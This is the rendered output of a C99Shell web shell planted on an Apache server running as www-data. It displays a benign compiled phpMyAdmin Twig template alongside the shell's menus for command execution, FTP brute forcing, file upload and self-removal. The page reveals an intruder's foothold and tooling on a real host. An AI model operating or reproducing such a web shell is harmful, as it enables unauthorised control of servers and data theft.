!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/lib/phpmyadmin/tmp/twig/f3/   drwxr-xr-x
Free 12.98 GB of 57.97 GB (22.39%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     f3009eed420b488c5fa9c079e38b8eb9ed386f434a10cef43e7c01b3902654be.php (3.07 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

use Twig\Environment;
use 
Twig\Error\LoaderError;
use 
Twig\Error\RuntimeError;
use 
Twig\Extension\SandboxExtension;
use 
Twig\Markup;
use 
Twig\Sandbox\SecurityError;
use 
Twig\Sandbox\SecurityNotAllowedTagError;
use 
Twig\Sandbox\SecurityNotAllowedFilterError;
use 
Twig\Sandbox\SecurityNotAllowedFunctionError;
use 
Twig\Source;
use 
Twig\Template;

/* display/results/show_all_checkbox.twig */
class __TwigTemplate_e8f83248cb700df2fbe6aaac6250d23df120624962381a3fbab63955e6767998 extends \Twig\Template
{
    private 
$source;
    private 
$macros = [];

    public function 
__construct(Environment $env)
    {
        
parent::__construct($env);

        
$this->source $this->getSourceContext();

        
$this->parent false;

        
$this->blocks = [
        ];
    }

    protected function 
doDisplay(array $context, array $blocks = [])
    {
        
$macros $this->macros;
        
// line 1
        
echo "<td>
    <form action=\"sql.php\" method=\"post\">
        "
;
        
// line 3
        
echo PhpMyAdmin\Url::getHiddenInputs(($context["db"] ?? null), ($context["table"] ?? null));
        echo 
"
        <input type=\"hidden\" name=\"sql_query\" value=\""
;
        
// line 4
        
echo ($context["html_sql_query"] ?? null);
        echo 
"\" />
        <input type=\"hidden\" name=\"pos\" value=\"0\" />
        <input type=\"hidden\" name=\"is_browse_distinct\" value=\""
;
        
// line 6
        
echo twig_escape_filter($this->env, ($context["is_browse_distinct"] ?? null), "html"nulltrue);
        echo 
"\" />
        <input type=\"hidden\" name=\"session_max_rows\" value=\""
;
        
// line 7
        
(( !($context["showing_all"] ?? null)) ? (print ("all")) : (print (twig_escape_filter($this->env, ($context["max_rows"] ?? null), "html"nulltrue))));
        echo 
"\" />
        <input type=\"hidden\" name=\"goto\" value=\""
;
        
// line 8
        
echo twig_escape_filter($this->env, ($context["goto"] ?? null), "html"nulltrue);
        echo 
"\" />
        <input type=\"checkbox\" name=\"navig\" id=\"showAll_"
;
        
// line 9
        
echo twig_escape_filter($this->env, ($context["unique_id"] ?? null), "html"nulltrue);
        echo 
"\" class=\"showAllRows\"";
        
// line 10
        
echo ((($context["showing_all"] ?? null)) ? (" checked=\"checked\"") : (""));
        echo 
" value=\"all\" />
        <label for=\"showAll_"
;
        
// line 11
        
echo twig_escape_filter($this->env, ($context["unique_id"] ?? null), "html"nulltrue);
        echo 
"\">";
        echo 
_gettext("Show all");
        echo 
"</label>
    </form>
</td>
"
;
    }

    public function 
getTemplateName()
    {
        return 
"display/results/show_all_checkbox.twig";
    }

    public function 
isTraitable()
    {
        return 
false;
    }

    public function 
getDebugInfo()
    {
        return array (  
69 => 11,  65 => 10,  62 => 9,  58 => 8,  54 => 7,  50 => 6,  45 => 4,  41 => 3,  37 => 1,);
    }

    public function 
getSourceContext()
    {
        return new 
Source("""display/results/show_all_checkbox.twig""/usr/share/phpmyadmin/templates/display/results/show_all_checkbox.twig");
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--